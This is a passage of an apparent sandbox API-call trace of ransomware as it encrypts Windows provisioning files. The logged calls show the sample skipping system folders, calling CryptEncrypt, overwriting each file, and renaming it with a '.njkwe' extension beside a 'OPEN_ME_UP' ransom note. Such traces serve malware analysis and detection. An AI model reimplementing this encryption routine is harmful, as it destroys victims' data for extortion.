cFileName="52__Connections_Cellular_Tele2 (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", cAlternateFileName="52__CO~1.PRO")) returned 1 [0081.819] lstrcmpiW (lpString1="52__Connections_Cellular_Tele2 (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.819] lstrcmpiW (lpString1="52__Connections_Cellular_Tele2 (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.819] lstrcmpiW (lpString1="52__Connections_Cellular_Tele2 (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.819] lstrcmpiW (lpString1="52__Connections_Cellular_Tele2 (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.819] lstrcmpiW (lpString1="52__Connections_Cellular_Tele2 (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.819] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\52__Connections_Cellular_Tele2 (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml") returned 173 [0081.819] StrStrIW (lpFirst="52__Connections_Cellular_Tele2 (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.819] lstrcmpW (lpString1="52__Connections_Cellular_Tele2 (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.819] lstrcmpW (lpString1="52__Connections_Cellular_Tele2 (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.819] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\52__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.819] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\52__Connections_Cellular_Tele2 (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\52__connections_cellular_tele2 (bosnia and herzegovina)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.820] GetTickCount () returned 0x1154c38 [0081.820] GetTickCount () returned 0x1154c38 [0081.820] GetTickCount () returned 0x1154c38 [0081.820] GetTickCount () returned 0x1154c38 [0081.820] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.820] GetProcessHeap () returned 0xbe0000 [0081.820] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.820] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x291, lpOverlapped=0x0) returned 1 [0081.821] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd6f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.821] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x291, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x291, lpOverlapped=0x0) returned 1 [0081.822] GetProcessHeap () returned 0xbe0000 [0081.822] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.822] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.822] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.822] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.822] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.822] CloseHandle (hObject=0x43c) returned 1 [0081.822] GetProcessHeap () returned 0xbe0000 [0081.822] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.822] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\52__Connections_Cellular_Tele2 (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 193 [0081.822] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\52__Connections_Cellular_Tele2 (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\52__connections_cellular_tele2 (bosnia and herzegovina)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\52__Connections_Cellular_Tele2 (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\52__connections_cellular_tele2 (bosnia and herzegovina)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.823] GetProcessHeap () returned 0xbe0000 [0081.823] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.823] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912f8e1e, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x912f8e1e, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x912f8e1e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x300, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="530__Connections_Cellular_Axis (Indonesia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="530__C~1.PRO")) returned 1 [0081.823] lstrcmpiW (lpString1="530__Connections_Cellular_Axis (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.823] lstrcmpiW (lpString1="530__Connections_Cellular_Axis (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.823] lstrcmpiW (lpString1="530__Connections_Cellular_Axis (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.823] lstrcmpiW (lpString1="530__Connections_Cellular_Axis (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.823] lstrcmpiW (lpString1="530__Connections_Cellular_Axis (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.823] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\530__Connections_Cellular_Axis (Indonesia)_i0$(__MVID)@WAP.provxml") returned 160 [0081.823] StrStrIW (lpFirst="530__Connections_Cellular_Axis (Indonesia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.823] lstrcmpW (lpString1="530__Connections_Cellular_Axis (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.823] lstrcmpW (lpString1="530__Connections_Cellular_Axis (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.823] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\530__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.823] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\530__Connections_Cellular_Axis (Indonesia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\530__connections_cellular_axis (indonesia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.824] GetTickCount () returned 0x1154c38 [0081.824] GetTickCount () returned 0x1154c38 [0081.824] GetTickCount () returned 0x1154c38 [0081.824] GetTickCount () returned 0x1154c38 [0081.824] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.824] GetProcessHeap () returned 0xbe0000 [0081.824] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.824] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.825] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.825] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.825] GetProcessHeap () returned 0xbe0000 [0081.825] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.825] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.825] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.826] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.826] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.826] CloseHandle (hObject=0x43c) returned 1 [0081.826] GetProcessHeap () returned 0xbe0000 [0081.826] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.826] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\530__Connections_Cellular_Axis (Indonesia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0081.826] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\530__Connections_Cellular_Axis (Indonesia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\530__connections_cellular_axis (indonesia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\530__Connections_Cellular_Axis (Indonesia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\530__connections_cellular_axis (indonesia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.827] GetProcessHeap () returned 0xbe0000 [0081.827] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.827] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912f8e1e, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x912f8e1e, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x912f8e1e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="531__Connections_Cellular_IM3 (Indonesia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="531__C~1.PRO")) returned 1 [0081.827] lstrcmpiW (lpString1="531__Connections_Cellular_IM3 (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.827] lstrcmpiW (lpString1="531__Connections_Cellular_IM3 (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.827] lstrcmpiW (lpString1="531__Connections_Cellular_IM3 (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.827] lstrcmpiW (lpString1="531__Connections_Cellular_IM3 (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.827] lstrcmpiW (lpString1="531__Connections_Cellular_IM3 (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.827] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\531__Connections_Cellular_IM3 (Indonesia)_i0$(__MVID)@WAP.provxml") returned 159 [0081.827] StrStrIW (lpFirst="531__Connections_Cellular_IM3 (Indonesia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.827] lstrcmpW (lpString1="531__Connections_Cellular_IM3 (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.827] lstrcmpW (lpString1="531__Connections_Cellular_IM3 (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.827] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\531__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.827] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\531__Connections_Cellular_IM3 (Indonesia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\531__connections_cellular_im3 (indonesia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.827] GetTickCount () returned 0x1154c38 [0081.827] GetTickCount () returned 0x1154c38 [0081.827] GetTickCount () returned 0x1154c38 [0081.827] GetTickCount () returned 0x1154c38 [0081.827] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.828] GetProcessHeap () returned 0xbe0000 [0081.828] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.828] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0081.829] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd37, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.829] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2c9, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0081.829] GetProcessHeap () returned 0xbe0000 [0081.829] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.829] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.829] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.829] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.830] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.830] CloseHandle (hObject=0x43c) returned 1 [0081.830] GetProcessHeap () returned 0xbe0000 [0081.830] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.830] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\531__Connections_Cellular_IM3 (Indonesia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0081.830] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\531__Connections_Cellular_IM3 (Indonesia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\531__connections_cellular_im3 (indonesia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\531__Connections_Cellular_IM3 (Indonesia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\531__connections_cellular_im3 (indonesia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.830] GetProcessHeap () returned 0xbe0000 [0081.830] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.830] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912f8e1e, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x912f8e1e, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x912f8e1e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x30b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="532__Connections_Cellular_Orange (Armenia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="532__C~1.PRO")) returned 1 [0081.831] lstrcmpiW (lpString1="532__Connections_Cellular_Orange (Armenia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.831] lstrcmpiW (lpString1="532__Connections_Cellular_Orange (Armenia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.831] lstrcmpiW (lpString1="532__Connections_Cellular_Orange (Armenia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.831] lstrcmpiW (lpString1="532__Connections_Cellular_Orange (Armenia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.831] lstrcmpiW (lpString1="532__Connections_Cellular_Orange (Armenia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.831] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\532__Connections_Cellular_Orange (Armenia)_i0$(__MVID)@WAP.provxml") returned 160 [0081.831] StrStrIW (lpFirst="532__Connections_Cellular_Orange (Armenia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.831] lstrcmpW (lpString1="532__Connections_Cellular_Orange (Armenia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.831] lstrcmpW (lpString1="532__Connections_Cellular_Orange (Armenia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.831] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\532__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.831] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\532__Connections_Cellular_Orange (Armenia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\532__connections_cellular_orange (armenia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.831] GetTickCount () returned 0x1154c48 [0081.831] GetTickCount () returned 0x1154c48 [0081.831] GetTickCount () returned 0x1154c48 [0081.831] GetTickCount () returned 0x1154c48 [0081.831] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.831] GetProcessHeap () returned 0xbe0000 [0081.831] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.831] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x30b, lpOverlapped=0x0) returned 1 [0081.833] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcf5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.833] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x30b, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x30b, lpOverlapped=0x0) returned 1 [0081.833] GetProcessHeap () returned 0xbe0000 [0081.833] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.833] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.833] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.833] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.833] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.833] CloseHandle (hObject=0x43c) returned 1 [0081.833] GetProcessHeap () returned 0xbe0000 [0081.833] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.833] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\532__Connections_Cellular_Orange (Armenia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0081.833] MoveFileW 